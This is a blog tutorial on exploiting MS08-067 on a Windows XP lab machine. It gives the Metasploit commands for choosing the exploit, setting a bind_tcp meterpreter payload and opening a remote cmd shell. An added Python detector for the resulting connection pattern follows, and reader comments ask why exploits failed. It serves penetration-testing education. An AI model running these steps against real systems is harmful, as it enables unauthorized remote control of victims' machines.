Windows XP Netapi Exploitation

March 7, 2016 | Views: 14656


In this article, I’ll show you how easily you can exploit a system running Windows XP using the Netapi exploit.

Before we start, you might be wondering why you’d exploit an old version of Windows. My answer is: you gotta take baby steps before you can run.


Lab Setup:

-> A Windows XP virtual machine with SP2/SP3 (I used SP2)

-> A Kali virtual machine / standalone system


I’ll leave finding the host on the network and identifying the services being run up to you.

Let’s assume you’ve found the IP address of your victim, which is say and your attacker machine’s is at


In your terminal on Kali, open up Metasploit:


In here, you’ll find: msfconsole, run it (it takes a moment to open)


Now we will search for the Netapi exploit:

msf>search netapi

You’ll be shown a number of results, among which you’ll find:



Copy this and paste as follows:

msf>use exploit/windows/smb/ms08_067_netapi


Now, you’ll get:

msf exploit(ms08_067_netapi)>


The exploit is chosen and we need to set certain parameters for this exploit:

msf exploit(ms08_067_netapi)> show options

Set RHOST (the remote host, i.e. the victim) and, if it is not set by default, RPORT as follows:

msf exploit(ms08_067_netapi)> set rhost

The port number for the remote host is set to 445 by default.


Our exploit is ready, but we need a payload for the exploitation. There are a number of payloads available, which can be searched as follows:

msf exploit(ms08_067_netapi)>search payload


I’ve tried bind shell and reverse shell. Here, we’ll go with bind shell:

msf exploit(ms08_067_netapi)> set payload windows/meterpreter/bind_tcp


Just like we set certain parameters for exploit before, we need to do the same here:

msf exploit(ms08_067_netapi)> show options


Set lport and lhost, which are the port number and IP address of the local machine/attacker machine:

msf exploit(ms08_067_netapi)>set lhost


We’re all set:

msf exploit(ms08_067_netapi)> exploit


If you’ve followed the steps correctly, you will be presented with a meterpreter prompt. To get the Windows cmd, type in the following command:

meterpreter> execute -f cmd.exe -c -H


A channel will be created in the following output form:

‘ channel 1 created’

meterpreter> interact 1

You’ll have the cmd of the victim!!


While choosing the exploit, you can use: >show targets to see which operating systems are vulnerable to this exploit.

The exploitation could have been done with:

windows/shell_bind_tcp but I went for the meterpreter command.


Read about meterpreter to know why. Here are a few links that you may find useful:


If you’ve just started with exploitation, you may have a lot of doubts, so do connect with me.
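The sequence this article walks through (an SMB connection to port 445, then the attacker connecting to the bind_tcp listener on the victim) leaves a recognisable trail in connection logs. The following is an added example, not part of the original article: a small Python correlator run over constructed log lines. The log format, the addresses, port 4444, the baseline port set and the 60-second window are all assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample: accepted inbound connections as "ISO-time src dst dport".
SAMPLE_LOG = """\
2016-03-07T10:00:01 192.0.2.50 192.0.2.10 445
2016-03-07T10:00:04 192.0.2.50 192.0.2.10 4444
2016-03-07T10:05:00 192.0.2.77 192.0.2.10 445
2016-03-07T10:05:02 192.0.2.77 192.0.2.10 139
2016-03-07T11:00:00 192.0.2.50 192.0.2.10 4444
2016-03-07T12:00:00 192.0.2.60 192.0.2.11 3389
"""

# Assumed baseline of ports these hosts legitimately serve.
KNOWN_SERVICE_PORTS = {135, 139, 445, 3389}
WINDOW = timedelta(seconds=60)


def parse(log_text):
    """Yield (time, src, dst, dport) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        try:
            yield datetime.fromisoformat(parts[0]), parts[1], parts[2], int(parts[3])
        except ValueError:
            continue


def find_bind_shell_pattern(log_text, known_ports=KNOWN_SERVICE_PORTS, window=WINDOW):
    """Return alerts where src hit dst:445 and then, within `window`,
    connected to the same dst on a port outside the known baseline."""
    last_smb = {}  # (src, dst) -> time of the most recent connection to 445
    alerts = []
    for ts, src, dst, dport in sorted(parse(log_text)):
        key = (src, dst)
        if dport == 445:
            last_smb[key] = ts
        elif dport not in known_ports and key in last_smb:
            if ts - last_smb[key] <= window:
                alerts.append({"src": src, "dst": dst, "port": dport,
                               "delay_s": (ts - last_smb[key]).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_bind_shell_pattern(SAMPLE_LOG):
        print(alert)
```

A reverse shell payload makes the victim connect outbound instead, so this correlation covers only the bind case used in the article.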

  1. Thanks for this. Actually I started Metasploit after some years, and this time when I followed this tutorial I got this:

    [*] Started bind handler
    [*] – Automatically detecting the target…
    [*] – Fingerprint: Windows XP – Service Pack 3 – lang:English
    [*] – Selected Target: Windows XP SP3 English (AlwaysOn NX)
    [*] – Attempting to trigger the vulnerability…
    [*] Exploit completed, but no session was created.

    Just want to confirm: does that exploit still exist in Windows?

  2. The following exception is displayed after a few seconds when I run the IE 8 exploit in win, also stopping Internet Explorer from working when the link is clicked.

    **IE ERROR code**

    Problem Event Name: BEX
    Application Name: iexplore.exe
    Application Version: 8.0.7601.17514
    Application Timestamp: 4ce79912
    Fault Module Name: StackHash_0a9e
    Fault Module Version:
    Fault Module Timestamp: 00000000
    Exception Offset: 00000082
    Exception Code: c0000005
    Exception Data: 00000008
    OS Version: 6.1.7601.
    Locale ID: 1033
    Additional Information 1: 0a9e
    Additional Information 2: 0a9e372d3b4ad19135b953a78882e789
    Additional Information 3: 0a9e
    Additional Information 4: 0a9e372d3b4ad19135b953a78882e789

    **in metasploit it will show following**

    [*] Server started.
    [*] ms13_037_svg_dashstyle – Gathering target information.
    [*] ms13_037_svg_dashstyle – Sending HTML response.
    [*] ms13_037_svg_dashstyle – Sending HTML to info leak…
    [*] ms13_037_svg_dashstyle – Using ntdll ROP
    [*] ms13_037_svg_dashstyle – Sending HTML to trigger…

    I tried several exploits and got the same result, which is not getting the meterpreter; it stopped from here. Why does it happen? Please help.
